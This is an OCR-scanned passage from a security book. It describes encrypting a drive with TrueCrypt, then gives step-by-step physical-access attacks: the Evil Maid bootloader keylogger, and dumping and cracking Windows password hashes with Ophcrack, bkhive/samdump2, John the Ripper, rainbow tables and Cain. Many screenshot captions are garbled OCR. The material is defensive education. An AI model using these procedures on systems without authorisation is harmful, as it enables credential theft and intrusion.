McGrew, is available for free download at http://www.mcgrewsecurity.com/tools/msramdmp/. After 
obtaining an image of the RAM with MSramdmp, the researchers used their AESkeyfind utility to 
locate the AES keys in the RAM. The AESkeyfind utility has been released to the public, and is avail- 
able on the Princeton website. However, the researchers have not released the final piece of the puzzle 
that will allow the BitLocker volume to be mounted within Linux. The video of the attack against 
BitLocker can be seen at the http://citp.princeton.edu/memory/. It is definitely worth watching. 


TrueCrypt 


TrueCrypt is an open source encryption product that works with any with any version of Windows 7, 
Vista, as well as XP, 2003, 2008, Mac OS X, and Linux. It is one of the best products I have ever used 
and a great way to keep your data secure. The best part about TrueCrypt is the price; it is absolutely 
free. The latest version of TrueCrypt can be downloaded at http://www. TrueCrypt.org/downloads. 

TrueCrypt will allow users to encrypt a container, a partition, and the system partition. The 
TrueCrypt program offers AES, Serpent, Two-Fish, AES-Two-Fish, AES-Two-Fish-Serpent, 
Serpent-AES, Serpent-Two-Fish-AES, and Two-Fish-Serpent encryption. When you select an 
encryption standard, a description and a corresponding web link are provided. The TrueCrypt 
program recommends that users use a password longer than 20 characters. 
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It would be extremely difficult to recover the contents of a TrueCrypt volume without the pass- 
word. One program called CrackTC can try to perform a dictionary attack against the password, 
but it may take a very long time to crack the password, especially if it is greater than 20 characters. 


TrueCrypt Volume Creation Wizard 


D WARNING: Short passwords are easy to crack using brute force techniques! 


So panan chong A panor cona Ker hai 2o it Are you 
sure you want to use a short passwort 


Tween (ma 


The best chance someone has at breaking into your TrueCrypt volume is to use a keystroke 
logger to capture the typed password or to set up a camera in view of the computer's keyboard. I£ 
you are trying to gain access to someone' system partition that was encrypted with TrueCrypt, 
your best bet might be trying to locate the recovery CD. 


Caution: Back up all your data before encrypting your system drive with TrueCrypt. The follow- 
ing steps are needed to encrypt a system partition using TrueCrypt: 


1. Double click on the TrueCrypt setup file. 

2. Read the license and accept the terms if you agree to be bound by the terms. 

3. Select Install and click Next. 

4. Click Install. You should see the message that TrueCrypt has been successfully installed. 


TrueCrypt Setup 


\ i ) TrueCrypt has been successfully installed. 


Lox] 


5. Click Yes to view the tutorial if you would like to view it. Otherwise click No. 
6. Click Finish. 

7. Double click on the TrueCrypt icon on the desktop. 

8. Click the Create Volume radio button. 


9. Select the bottom choice, “Encrypt the system partition or the entire system drive,” and click 
Next. 


f TrueCrypt Volume Creation Wizard ©) fx] 


TrueCrypt Volume Creation Wizard 


C Create an encrypted file container 


Creates a virtual encrypted disk within a file. Recommended For 
inexperienced users. 


More information 
C Encrypt a non-system partition/drive 
Encrypts a non-system partition on any internal or external 
drive (e.g. a flash drive). Optionally, creates a hidden volume. 
(* Encrypt the system partition or entire system drive 


Encrypts the partition/drive where Windows is installed. Anyone 
who wants to gain access and use the system, read and write 
eere 

'e Windows boots. Optionally, creates a hidden system. 


eee irse 


we | c [em] oce | 
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10. There are two choices for encrypting the system drive: Normal and Hidden. Select Normal 
to encrypt the system partition. If you choose Hidden, the TrueCrypt disclaimer explains 
that the existence of the operating system will be impossible to prove. 


© TrueCrypt Volume Creation Wizard 


Type of System Encryption 


© Normal 


Select this coton F you mately ARE Ho'encrypt the system 
partition or the entire system 


C Hidden 
E may happen that you are Forcnc by sonebody to decrypt thè 
operating system. There are many situations where you cannot 
refuse to do so (for example, due to extortion). If you select 


detailed explanation, please click the link below. 
More information 


ne | ceuk [OE] TN 


11. Select the option to encrypt the whole drive. If this option is used, users will have to enter 
the TrueCrypt password in order to access the operating system each time the system is 
started. This will keep your computer safe from attacks that can be performed using a Live 
CD when an attacker gains physical access to your computer. 


E TrueCrypt Volume Creation Wizard 


Area to Encrypt 


C Encrypt the Windows system partition 


UR a eae 
is installed and from which it boots. 


@ Encrypt the whole drive 
Select this option if you want to encrypt the entire drive on 


inyone 
files stored on the drive, will need to enter the correct 
password each time before the system starts. This option 
cannot be used to encrypt a secondary or external drive if 
Windows is not installed on it and does not boot from it. 


M ces | 


12. Select No to the option to encrypt the host protected area, or HPA. The HPA is an area of 
the hard drive that is normally reserved for manufacturer configuration. 

13. The next option allows the user to specify if their system is running more than one operating 
system, like in the case of a dual boot. If your system only has one operating system (most 
common), choose Single Boot. Click Next at the Number of Operating Systems screen. 
Note: The TrueCrypt program warns users that the option to encrypt multiboot systems is 
not really for the inexperienced user. 

14. Select an encryption algorithm from the list; the TrueCrypt program provides a detailed 
description of each encryption algorithm as they are selected from the list. You can accept 
the default choice of Advanced Encryption Standard, or AES. By clicking the Benchmark 
button twice, you will be able to view the speeds of each encryption algorithm in MB per 
second. Speed will vary depending on the horsepower of your computer. 
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15. At the Password screen, select a good password that you can remember. It should include a 


combination of uppercase, lowercase, numbers, and special characters. 


16. The next screen is titled Collecting Random Data. The TrueCrypt program states that you 
should move your mouse randomly within this window. The longer you move your mouse 
in the window, the stronger the encryption keys will be. Click Next when you are ready to 
go to the next screen in the setup process. 

17. At the next screen, you can choose the location of the TrueCrypt rescue disk ISO. 

The ISO must be burned to CD before you are allowed to click Continue in the TrueCrypt 
program. Use a program such as Imgburn to burn the rescue CD. Keep it in the CD drive 
after it finishes burning because it is required in order for you to click Next in the TrueCrypt 


volume creation wizard. Store your CD in a hidden location. 


=) ImgBurn 


Wow 


File View Mode Tools Help 
Source 
S CV. ATrueCrypt Rescue Disk.iso 


Label: TrueCrypt Rescue Disk. 
ImpID: Unknown 
File Sys: ISO9660 (Bootable) 


: 896 (MODE1/2048) 
Size: 1,835,008 bytes 
Time: 00:13:71 (MM:SS:FF) 


E&O C Test Mode 


Jr 


Ready 


ca d, 


HP DVD Writer 640c J504 (ATA) 
Current Profile: CD-R 


Disc Information: 


Free Space: 736,966,656 bytes 
Free Time: 79:59:72 (MM:SS:FF) 
Supported Write Speeds: 8x, 12x, 16x, 24x, 32x, 40x 


ATIP Information: 


Start Time of LeadIn (MID): 97m24s16f 
Last Possible Start Time of LeadOut: 79m59s74f 


Settings 
Write Speed: 1x Y a 


Copies: 1 v 


18. Click Next at the Rescue Disk Verified screen. 


19. At the Wipe Mode Selection screen, click None, unless you want to wipe any deleted files or 
folders that may still exist on your system. The options for wiping include a 3, 7, and 35 pass 


wipe. 7 wipes meet the U.S. Department of Defense standard. 


20. Click Test, OK, and Yes to restart your system. You will now need the password to boot 
the system. Type the password in and boot into Windows. You will now need to enter the 
password every time the system is booted. 


TrueCrypt 


Ke 
[E 


Enter 


Boot Loader 


yboard Control 
cl Skip Authentication 


password: 


Copyright 


(Boot 


TrueCrypt 


Manager ) 


Foundation 
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Evil Maid 


Evil Maid is a very interesting attack against TrueCrypt developed by Joanna Rutkowska. 
TrueCyrpt allows users to encrypt their operating system volume. After installation, users are 
required to enter a password in order to get the system to boot. The attack works by installing a 
keylogger application in boot area. The attacker would boot the system to a thumb drive, and then 
run the Evil Maid program. 


At this point, the keylogger would be installed, but the user will not have the password to boot 
the system. In order to get the TrueCrypt password, the attacker would need to wait for the user to 
enter their password in the system, then go back at another time and run the Evil Maid program 
again. Then the TrueCrypt password would be displayed. 


To create an Evil Maid thumb drive, and run in on a system with a TrueCrypted operating 
system: 


1. Boot your system to any Linux distribution. 

2. Download the Evil Maid image from http://invisiblethingslab.com/resources/evilmaid/ 
evilmaidusb-1.01.img. 

. Open a terminal and type fdisk -1. 

. Insert a blank thumb drive into your system. 

. Type fdisk -l again to determine the naming convention for your device, for example sdb. 

. dd if=/evilmaidusb-1.01.img of=sdb. 

. Boot the laptop where TrueCrypt is installed to the thumb drive. 

. Run the Evil Maid program. 


ON WN BR OD 


44 m Defense against the Black Arts 


9. Come back later after the password has been entered by the TrueCrypt user. 
10. Run the Evil Maid program again and retrieve the password. 


Some people think their system can be safe from this attack by not allowing their laptop to boot 
to a thumb drive. Some machines can be booted to devices such as a thumb drive by hitting keys 
such as F8 when the computer is turned on. The hard drive could also be pulled from the system 
and placed into another system with a more "friendly" BIOS. 

Once the TrueCrypt password is obtained, there is a way to view the files on the system with- 
out knowing the Windows password. Boot the system to the BackTrack 4 R1 DVD and perform 
the following steps: 


1. Open a terminal and type truecrypt. 
2 Click Select Device from the lower right corner of the screen. 
3. Select the partition, not the device, from the menu and click OK. 


Select a Partition or Device 


/dev/hdal 


4. Select Mount and select Options. 
5. Check Mount partition using system encryption (preboot authentication). 


Enter password for "/dev/hdal" 


Password: eeeeeeee | 
C Cache passwords and keyfiles in memory 
Ci Display password 


O Use keyfiles Keyfiles... i Options < 


C Mount volume as read-only 


Mount partition using system encryption (preboot authentication) 


6. Type in the password that Evil Maid indicated was the TrueCrypt password and click OK. 
7. If the device has been mounted successfully, it will be displayed in the box and mounted to 
a folder within the media directory. 


4 |/devihdal 10.0 GB |/media/truecrypt4 
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8. Type Is /media/truecrypt# to view the files and folders on the system. 


root&bt: ~ - Shell - Konsole <2> 


Session Edit View Bookmarks Settings Help 


*.|| @ Shell 


Summary 


An attacker with physical access to most Windows machines can break into the operating system 
in a matter of seconds. Legitimate Windows programs like Sticky Keys and Utility Manager can 
be utilized to gain SYSTEM access on Microsoft Windows. Even systems with fingerprint and 
Smart Card readers are vulnerable to these attacks. Once SYSTEM access has been obtained, 
the attacker is able to wreak havoc on the computer's operating system. Accounts can be created, 
disabled, activated, and deactivated. Services such as the firewall and antivirus can be stopped and 
started, and the registry can be altered. 

Physical security needs to be taken seriously. The use of BitLocker can prevent some of the 
common physical attack vectors against Windows systems like Sticky Keys and Utility Manager. 
However, BitLocker is only available on Server 2008 and the Ultimate and Enterprise editions of 
Windows Vista and 7. These versions come with a higher price tag than the other "lesser" versions 
of the operating systems. If you are serious about securing Windows from possible physical attack 
vectors, it might be worth the extra money to purchase the Ultimate version of Windows 7 or 
Vista. While you might pay more for the higher-end operating system, you can have more peace 
of mind if you have an operating system that supports BitLocker volume encryption. If you do 
plan to buy Ultimate and implement BitLocker, store the recovery keys in a safe place and turn 
the machine off when it is not in use! A final option is to consider using TrueCrypt, a free product, 
which can help to secure the operating system. 


Chapter 2 


Obtaining Windows 
Passwords 


Introduction 


Passwords are an integral part of our lives in today’s electronic world. Most people are accustomed 
to entering a username and password for their computers at work and home. In order to access 
their Gmail, Yahoo, Hotmail, or corporate email, individuals need a password. Many people do 
online banking or pay their bills online and need passwords to access their bank and credit card 
accounts online. In order to access their Facebook, Twitter, and MySpace accounts, users need a 
password. And, for shopping, many have Ebay and PayPal accounts, which also require a user- 
name and password. 

Passwords are the "keys to the kingdom" in many cases because once you have a user's account 
name and password, it is “game over.” And, even worse, many users use the same password (or a 
slight variation) across multiple accounts. However, the most shocking part of the password puzzle 
is that people still commonly use the names of their family members, pets, favorite sports teams or 
music groups, and hobbies for their passwords. And many people seem to use the same passwords 
over and over from site to site on the Internet. This can make a user's password a single point of 
failure for that person's accounts and possibly their identity. This can be why revealing a password 
to a single account can be gold for an attacker. 

Using strong passwords with uppercase, lowercase, and special characters and a minimum 
length of 8 characters is advisable. It is a serious miscalculation to believe that extremely strong 
passwords will secure your account. Users also tend to forget or write down their passwords when 
they are extremely complex. Companies have mechanisms like help desk staff or reset password 
features that can be exploited by people with social engineering skills. The increased processing 
power of today's computers allows software programs like John the Ripper to crack passwords in 
a matter of seconds or minutes. 

If you have the strongest password of any user on Ebay, and fall victim to a phishing scheme, 
your password and your account can still be compromised. If you have the strongest password 
in your company, and the company is not using encryption, your password can be revealed in 
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network traffic or by analyzing accounts on the system. Even a very strong password over an 
encrypted HTTPS session can be compromised during a “man-in-the-middle attack.” 

Passwords are extremely important to securing our data and personalities. Many high-profile 
cases exist in the media, including that of Paris Hilton and Sarah Palin, where passwords have 
been cracked by an attacker. It is important to understand the vulnerabilities associated with 
password and the mechanisms that can be used to keep your passwords out of the hands of the 
attacker. 


Ophcrack 


Ophcrack is a Live CD that was designed to crack Windows passwords. It is a free utility and it 
works with Windows 2000, XP, 2003, Vista, 2008, and Windows 7. 'Ihe Live CD comes in two 
versions, one for XP and one for Windows Vista. The XP Live CD should be used on Windows 
2000, XP, and 2003 systems. The Vista Live CD should be used on Vista, 2008, and Windows 7 
systems. Ophcrack is the easiest way to get a user's password when you have physical access to a 
machine. Just boot to the Live CD and it will find the user accounts and their corresponding pass- 
words with little difficulty. The Ophcrack Live CDs are available for download at http://ophcrack. 
sourceforge.net/. 


Download ophcrack LiveCD 


The latest version of ophcrack LiveCD is 2.3.0 (including ophcrack 3.3.0) 


ophcrack XP LiveCD 
ophcrack-xp-livecd-2.3.0 iso 


md5sum: d7f2bb179b1554cd7884e1a3efc8553c 


ophcrack Vista LiveCD 
ophcrack-vista-livecd-2 3.0 iso 


md5sum: 104461388ac8e5135b80cc2b373fad96 


After downloading the Live CD, use the image burn program to burn the ISO file to CD. 
After opening the image burn program, select "Write image file to disc." 


lr c ck4—-——————— Pf] ~) 


Ele View Mode Tools Help 


Source: HP DVD Writer 640c J504 (ATA) 

<æ Ciophcrack-vista-livecd-2.3.0.iso. GP Current Profile: CD-R 

Label: Ophcrack LiveCD Eure 

Imp ID: Unknown Erasable: No 

File Sys: 1509660 (Bootable) Free Sectors: 359,847 

Free Space: 736,966,656 bytes 

Free Time: 79:59:72 (MM:SS:FF) 
Supported Write Speeds: 8x, 12x, 16x, 24x, 32x, 40x 


Sectors: 252,398 (MODE1/2048) 
Size: 516,911,104 bytes 


Time: 56:07:23 (MM:SS:FF) D (9 | aT information: 
Start Time of Leadin (MID): 97m24s16F 
Destination Last Possible Start Time of LeadOut: 79m59s74F 
(opie aa -| 
(@ Ditest Mode Z verity So 
@ settings — 
> Write Speed: | 1x iv] E] 
Copies: In m G o 
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Restart the Windows system and boot the Ophcrack Live CD. Chapter 1 covers in detail how 
to ensure a system will boot up to CD/DVD. Once the system boots to the Live CD, no additional 
user interaction is required. All of the Windows accounts will be displayed along with their cor- 
responding passwords that the program is able to crack. 


eee ee 


Tables Crack 


e52cac67419a9a2... 8846f7eaee8fb117... 
Guest 3ld6cfe0d162e03... empty 
HelpAssistant 593a88136781a34... d8affbf37díde484.. not found not found not found 


SUPPORT 38894530 2afe57dfee213f76... not found 
jesse O9eeab5aadl5d6e.. bbcefifícfe031235.. NEWPASS WORD newpassword 
kim 3c381503fc28ee., 9360ela9f7fee5df.. FEBRUAR n2 februaryl2 
mason 21f5a72c8b73d6... 9d68532952042b..._ not found LE] not found 

| |sportsguy 2ab50baf8227ca9... aa65f52cfcO6bOb.. LAKERS2 009 lakers2009 


Do not be disappointed if Ophcrack does not reveal the Windows password. If you save the 
hashes, there are other tools that can be used to obtain the passwords. To save the hashes, click 
the Save button and click Save to File. Double click on the Tux folder in the left-hand pane of the 
Save File dialog box, and click Save. 


Save File .DX 


[Lm jeooda(js 


(f Desktop fi New Folder 
F Documents 89] Templates 


M Images launch sh 

[E 
c Em T— 
Files of type: (an Files (*) |v) Cancel | 


Insert a USB device into the system so you can copy the ophcrack.txt file with the hashes. 
Click the terminal button to open a shell. 


Menu Om ca (Ba oos [-ophrak — 


The following steps are needed to mount the USB drive and copy the file to the device: 


. Type the command su — root to switch to the root user. 
. The root password for root is root. Type root. 
. Type the command fdisk —l to view the partition table (letter l, not number 1). 
. Mount the disk by typing mount /dev/sdal /media/usbdisk. 

Note: The last drive letter designation in the list should be the correct one. 
5. Type cp /home/tux/ophcrack.txt /media/usbdisk to copy the ophcrak.txt file. 
6. Type umount /media/usbdisk to unmount the device. 
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Password Hashes 


The free version of Ophcrack has some rainbow tables. According to the website, the free version 
will recover 99.9 % of alphanumeric passwords. So if a user uses special characters, such as # or 96, 
it is extremely unlikely that their password will be cracked. The company Objectif Securite also 
sells more extensive tables; you can browse through their extensive selection at http://ophcrack. 
sourceforge.net/tables.php. And, while it may not have found the password for all of the accounts 
on the system, Ophcrack was able to locate the hashes. There are two types of hashes, LM and 
NTLM. LAN Manager, or LM, hashes are weaker and used in all versions of Microsoft Windows 
prior to Vista. The LM hash is divided into two seven-character segments and therefore can be 
a maximum of 14 characters long. The main purpose of using the LM hash is for backwards 
compatibility with previous legacy version of Microsoft operating systems. Ihe NTLM, or New 
Technology LAN Manager, hash is more secure and used in Windows but enforced in Vista and 
higher. 

Once a Windows hash is obtained, a variety of tools can be utilized to get the password, 
including John the Ripper, the website http://nediam.com.mx, and rainbow tables. Open the text 
file with the hashes with Wordpad instead of Notepad. Each username has two hashes associated 
with it. The first hash is the LM hash and the second hash listed is the NTLM hash. A breakdown 
of the ophcrack.txt file: 


1% entry 2"d entry 3"! entry 4'^ entry 5'^ entry 6'^ entry 7^ entry 


Username RID NT hash NTLM hash | LM pass 1 | LM pass 2 NT pass 
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Nediam.com.mx 


The link http://nediam.com.mx/winhashes/index.php allows you to submit these password hashes 
(LM or NTLM) to its online database. If the hash already exists in its database, the website will 
display the corresponding password. If the website does not have the password for the hash, it 
will use its rainbow tables to locate the password with 24 hours. Note: This seems to be valid for 
Monday-Friday only and requires 24 business hours. 


E ] Windows Hashes Repository - Search NT Hash - Microsoft Internet Explorer = AX] 


: Ple Edt View Favorites Tools Help pJ 
Q- O- [3 (2 (à Pm eroe O I SRJ na” 
Address | 48] http://nediam.com.mxjwinhashes/search_nt_hash.php [v] Ee Links ? : È- 


| | 
Windows Hashes Repository 1.0 


Search Plaintext Password 


Search NT Hash 


Notes: 


Search NT Hash - The NT hash MUST be expressed as 16 hex digits (32 chars long) 


- Example of a valid NT hash is: O66ddfd4efüe9cd7c256fe77191ef43c 
Credits 
NT Hash: |9d68532952042b2361 ebS8f8bOfe8fec 


John the Ripper 


John the Ripper can also be utilized to break passwords on a local Windows machine. John the 
Ripper is a password cracker that is capable of breaking Windows and Linux passwords. John the 
Ripper may take some time to break some of the more difficult passwords; a computer with more 
memory and processing power will help make the cracking process go quicker. If a crack is taking 
longer than 24 hours, consider using nediam.com.mx or the rainbow tables. 

To crack Linux and Unix passwords with John, the /etc/shadow file is needed. When crack- 
ing Windows passwords, the SAM and the system files are required. The SAM and system files 
are both files from the Windows registry, which is a database of user and computer settings. Two 
tools, bkhive and samdump2, can be used to get the hashes off a Windows machine that is booted 
to the BackTrack Live DVD. 

The following steps are needed to get the Windows hashes using the BackTrack 4 DVD: 


. Boot the system up to the BackTrack 4 DVD. 
. Log in as root with the password of toor. Type startx to bring up the GUI. 
. Open a terminal and type the command fdisk —l to view the partitions. 
. In this case, the Windows directory will be mounted to /mnt/sdal. 
Note: This can vary based on your disk and partition configuration. 
5. Navigate to the config directory by typing the following (case sensitive): 
cd /mnt/sdal/Windows/system32/config. 
Note: Change this to match fdisk output. For example, if you saw /dev/hdal cd /mnt/hdal. 
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root@bt: ~ - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


Session Edit View Bookmarks Settings Help 


7. To copy both the SAM and the system files (case sensitive) to the jtr directory, type cp SAM 


11. 


system /pentest/password/jtr. 


Session Edit View Bookmarks Settings Help 


. Type Is /pentest/password/jtr to verify that system and SAM have been copied. 
. Navigate to the jtr directory by typing cd /pentest/password/jtr. 
10. 


Type bkhive system bootkey. 

Note: A bootkey should be displayed. 

Type the following command to extract the hashes: 
samdump2 SAM bootkey > winhashes.txt. 

Note: The message Root Key : SAM should be displayed. 
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Session Edit View Bookmarks Settings Help 


if f6cOa9d1 
# samdumpz 


Securite 


[E] at Shell | 


12. Type the following command to view the hashes: 
more winhashes.txt 

13. Type the following command to edit the hashes.txt file: 
kwrite winhashes.txt 

14. Erase all of the accounts and corresponding hashes that you do not want John to waste time 
and energy trying to find, that is, Support, Help Assistant, Guest. The real administrator 
account in the case of a rename will have the RID of 500. Save the file. 


o winhashes.txt [modified] - KWrite 
File Edit View Bookmarks Tools Settings Help 


We aX 9 Y  MEEWE A-" 


Administrator:500:9e88305fbcc4d94f 93e28745b8bf 4ba6: 12a9af 3702af 789b52b2c2474e552ef d: : : 
Suest:501:aad3b435b51404eeaad3b435b 7e0c089c0: : : 
elpAssistant:1000:0024e04cf 3b2675f 4f 3ddf 40bcb41f42c3: :: 
. 38894520: 1002: aad3b435b51 11ba2673efb801e2d9ada::: 
jesse: 1004: e6088f5ec227d7f393e28745b ` Cut : c83a2200a6: : : 


ason: 1005: 001d5146bf 2c49aa224c492e7| Copy Ctri+C 20190af 327: : : 
F Paste Ctrl+V 


Select All Ctrl+A 


15. Type the following command to run the hashes though John the Ripper: 
./john winhashes.txt 
The displayed password is steelers. Sorry Browns, Bengals, and Ravens fans! 


mg root@bt: /pentest/password/jtr - Shell - Konsole 


Session Edit View Bookmarks Settings Help 


| t Shell [ 
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Rainbow Tables 


The rainbow tables are a group of tables where hashes and their corresponding password values are 
already precomputed. Any user on any Windows system who has the password of lakers2009 will 
have a corresponding NTLM hash of aa65f52cfc96b9b86b94ed8263639901. The hash will not 
vary from machine to machine if the passwords are different. 

If a user on a system had a password of lakers2009, and that hash and password are in the 
rainbow table you are running the hash against, the password will be displayed. There is no crack- 
ing with rainbow tables; all of the cracking (or heavy lifting) is done beforehand. If a user's hash is 
not within the rainbow table, the password will not be displayed. In the example table below, only 
three hashes and their corresponding passwords are displayed. So, in order for this sample table to 
provide the password for the corresponding NTLM hash, the password would need to be febru- 
aryl12, lakers2009, or password. Obviously the larger the rainbow table, the more chances your 
hash will be included. However, a larger rainbow table also means a longer search time though the 
hashes and their corresponding passwords. It can take a while to search for a hash and its password 
thorough a very large rainbow table. 


NTLM Hash Corresponding Password 
9360e1a9í7fee5df75edba64f8b3c897 february12 
aa65f52cfc96b9b86b94ed8263639901 lakers2009 
8846f7eaee8fb117ad06bdd830b7586c password 


Most rainbow tables will have certain character sets within them. For example, some rainbow 
tables might have letters, numbers, special characters, or all three. Rainbow tables will become 
larger as the number of values in the table increases. However, a more extensive rainbow table will 
increase the chances that a password can be cracked. 

There are different options for obtaining rainbow tables. You can create your own tables, 
download the tables via http or BitTorrent, or purchase them. The website http://tbhost.eu offers 
free downloads of rainbow tables. The rainbow tables can be downloaded via the following link: 
http://tbhost.eu/rt.php?algorithm-1. If you do not have the time (or bandwidth) to download a 
large amount of tables and have the money, the website http://www.freerainbowtables.com offers 
purchase of rainbow tables. 

Another option is to generate your own rainbow tables. The program Winrtgen will allow 
users to generate their own rainbow tables. With just a few clicks, Winrtgen users can create LM, 
NTLM, WPA-PSK, and other rainbow tables. Options for table character sets include uppercase 
and lowercase letters, numbers, bytes, special characters, or a mix of all of them. The benchmark 
button will provide an estimate of how long a specific table will take to generate. 

‘The following steps are needed to create your own rainbow tables: 


1. Download Winrtgen from oxid.it: http://www.oxid.it/downloads/winrtgen.zip. 

2. Unzip the file and double click on winrtgen.exe. 
Note: Even though winrtgen.exe may cause antivirus to fire off, it is not harmful to your 
system. It can be used to crack passwords, so some vendors classify it as a hacking tool. 

3. Click the Add Table button in the bottom left-hand pane of the Winrtgen program. 
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4, For this example, use the LM hash type. The good news is that because the LM hash is 
broken up into two seven-character segments, the max length value of seven will find LM 
passwords that are less than 14 characters. Notice that other hash set types can be selected 
from the drop down menu. There are several choices, including LM and NTLM. Keep in 
mind that Vista, 2008, and Windows 7 all require NTLM hash sets. The NTLM hash sets 
will often be significantly larger in size than the hash sets for LM and will take much more 
time to generate. 

5. Choose alpha for the character set. The following values are present when the user chooses 
alpha (all uppercase letters) in conjunction with the LM hash: 

— Key space of 8353082582 keys 

— Size of 610.35 MB (fits nicely on a CD) 

— Success rate of 97.80 % 

By clicking the Benchmark button, in the lower left-hand corner of the program, the follow- 
ing values are present: 

— Hash speed 

— Step speed 

— Table precomputation time 

— Total precomputation time 

— Max cryptanalysis 


The benchmark values will vary greatly depending on your RAM and processing power. 
Agencies that generate massive rainbow tables use cluster servers. 


Min Len Max Len r Index Chain Len Chain N* of tables 


| [e —m|R P| B [pm Rm |p 
es Ed | 
[ABCDEFGHWKLMNOPQRSTUVWXYZ 


r Table properties 


Key space: 8353082582 keys 
Disk space: 610.35 MB 
| Success probability: 0.978038 (97.80%) 


r Benchmark ————______————————__ r Optional parameter — — — — — — — — —— 
Hash speed: 2356267 hash/sec Imo c — 
Step speed: 1602564 step/sec 

Table precomputation time: 16.64 hours 

Total precomputation time: 16.64 hours 

| Max cryptanalysis time: 1.79712 seconds 


fo 


If the number two is entered in the number of tables, the success probability goes up to 99.85 
after clicking the Benchmark button. However, the total computation time doubles even though 
the success probability only goes up by 2.15 %. With the number of tables set to three, the success 
probability is 100%, but the computation time takes three times as long. For a rainbow table with 
uppercase letters and numbers, one table only gets you a 60.71 % success probability. 

In order to get to a success probability of 99.06 %, five tables have to be generated. 
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Max Len» r Index Chain Len Chain Count N° of tables 


| CDEFGHUKLMNOPGRS TUVWxY20123456789 


r Table properties 
| Key space: 80603140212 keys 


| [Disk space: 238 GB (610.35 MB each table 


Lc — 


r- Benchmark i l 
| Hash speed: 2258355 hash/sec Dawn 777 
| Step speec 1618122 step/sec 

| Table precomputation time: 16.48 hours 
| Total precomputation time: 3.43334 days 
| Max cryptanalysis time: 8.89921 seconds 


coos 


6. Clicking the Edit button will allow you to change the character set. You even have the abil- 
ity to use different language sets. Once you have selected the hash, number of tables, and 
character set, click the OK button in the bottom right-hand corner of the Rainbow Tables 
Properties screen. Click Start at the Winrtgen v2.8 (Rainbow Tables Generator) by mao 
screen. The status column will indicate what percentage of the table is finished. 


E Winrtgen v2.8 (Rainbow Tables Generator) by mao 


Ein sphaldi-7 6 2400«40000000 oxidttOOD it 7200 of 40000000 (0.018%) done 


7. Once the tables have been created, they can be used with a program such as Cain (www.oxid. it) 
to reveal passwords. The file(s) created will have an .rt extension. 
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Cain & Abel 


Once you have generated your rainbow tables, you can use the Cain program to crack the 
passwords. While Cain is one of the best password cracking utilities on the market, the prod- 
uct only works on Microsoft Windows. Sorry, Mac and Linux users. Abel, the counterpart 
to Cain, is a small executable that will give an attacker unfettered access when it is installed 
on a victim machine. Cain & Abel is a free product and can be downloaded from the Italian 
website oxid.it at the following link: http://www.oxid.it/cain.html. The program requires the 
WinPcap driver, which allows the network card to run in promiscuous mode within Windows. 
It will automatically be installed for you at the end of the installation of Cain if it is not pres- 
ent on the system. 

In order to run the Cain program, you will need to disable your antivirus. Even though Cain 
is not a virus, it is detected as one because it has the ability to harvest passwords from the system. 
After Cain is installed on a Windows machine, a variety of passwords can be retrieved from the 
local system. The Cain program also includes network sniffer tools that will retrieve passwords 
from other systems. 

Open the Cain tool and click on the Cracker tab. The Cain program has the ability to crack a 
large number of passwords, including Microsoft, Cisco, Oracle, VNC, and Wireless. Right click 
in the window pane on the right side and select Add to list. 


~ File View Configure Tools Help 
(Se ORR tyususuummuHsO€709:* il 


HA unc mum Hashes (0) 

HA nn Hashes (0) 

HA MS-Cache Hashes (0) 

È Pw fies (0) 

TE Cisco 105-MD5 Hashes (0) 

TI Cisco PIX-MDS Hashes (0) 

Sp APOP-MD5 Hashes (0) 

© CRAM-MDS Hashes (0) 

> OSPF-MDS Hashes (0) 

«P. RIPV2-MDS Hashes (0) 

«f» VRRP-HMAC Hashes (0) 

ipd wc-aoes (0) 

md Mp2 Hashes (0) 

md Mp4 Hashes (0) 

md MDS Hashes (0) 

SH SHA-1 Hashes (0) 

SP SHA-2 Hashes (0) 

R, RIPEMD-160 Hashes (0) 
KerbS PreAuth Hashes (0) 
Radius Shared-Key Hashes (0) 

69 IKE-PSK Hashes (0) 

Fh MSSQL Hashes (0) 

Ep MySQL Hashes (0) 

5 Orade Hashes (0) 

Gy Orade TNS Hashes (0) 

G SIP Hashes (0) 

^ij 802.11 Captures (0) 

"Y? WPA-PSK Hashes (0) 


Select the choice to “Import Hashes from local system.” The second choice in the list allows 
you to import hashes from a text file. You can use this option when you dump the hashes from a 
local system using programs like pwdump and fgdump. Using the last option, import hashes from 


a SAM (security accounts manager) database, requires the SAM file and bootkey from the system 
file. Click Next. 
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Add NT Hashes from 


-(* Import Hashes from local system 
[^ Include Password History Hashes 


Import Hashes from a text file 


C Import Hashes from a SAM database 


is eee ee d 
rae Rc oor s 


Corcel [Won] 


All of the usernames from the local system will appear. If the password for the corresponding 
user is blank, Cain will report the password as *empty*. A red X next to the username field means 
that the password has yet to be revealed. Cain is capable of displaying both the LM and NT pass- 
words for each user account. There are also columns for the LM and NT hashes that correspond 
to each password. 


User Name LM Password « 8 | NT Password LM Hash NT Hash 

X Administrator ES2CAC67419A... 8846F7EAEEBF. 
$^ Guest * empty * * — *empty* AAD3B435BS14... 31D6CFEOD16A 
X HelpAssistant 3DEDEBAAADF... S85AE25E67E4, 
X jesse * D7D776BDCC6...  CDBFA4480F38. 
X kim * AABS18DB6SEC... CI8D205C3302 
X mason SO80ECIC3BDC,.. EAS4CCD01049 
X SUPPORT _388945a0 * empty * * AAD3B435BS14... 4B89F0813B91. 


There are several ways to crack the password for each user. If you do not have any rainbow 
tables, you can attempt to crack the password via brute force or dictionary attack. The brute force 
attack will just try every possible combination of characters until the password is found. For the 
dictionary attack to be effective, the user's password must be in your dictionary file. There is 
a small dictionary file called wordlist.txt that comes with Cain and Abel. It is located in the 
C:\Program Files\Cain\Wordlists directory. Feel free to add your own words to the wordlist or 
create a new dictionary file. A good attacker can use words that the victim is most likely to use. For 
instance, if the person who uses the computer is a huge basketball fan, you might want to include 
the words lakers, celtics, kobe, lebron, kingjames, jordan, and so on. These are the same techniques 
used by “good guys” to break the passwords of “bad guys.” There are also plenty of websites were 
you can download dictionary files. One of my favorite websites to get word lists from is the Church 
of the Swimming Elephant. The word lists are available at http://www.cotse.com/tools/wordlists1. 
htm and http://www.cotse.com/tools/wordlists2.htm. 

To initiate a brute force attack, right click on the user account and select Brute-Force Attack. If 
you are conducting a brute force attack against a Windows XP, NT, 2000, or 2003 system, select 
LM Hashes. If you are conducting the attack against a machine running Vista, Windows 7, or 
Windows 2008, select NTLM Hashes. 
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XE 5., prm ‘a UI 


f SS Cryptanalysis Attack >» LM Hashes + challenge ; 
NTLM Hashes 
Rai 
ainbowcrack-Online NTLM Hashes + challenge 
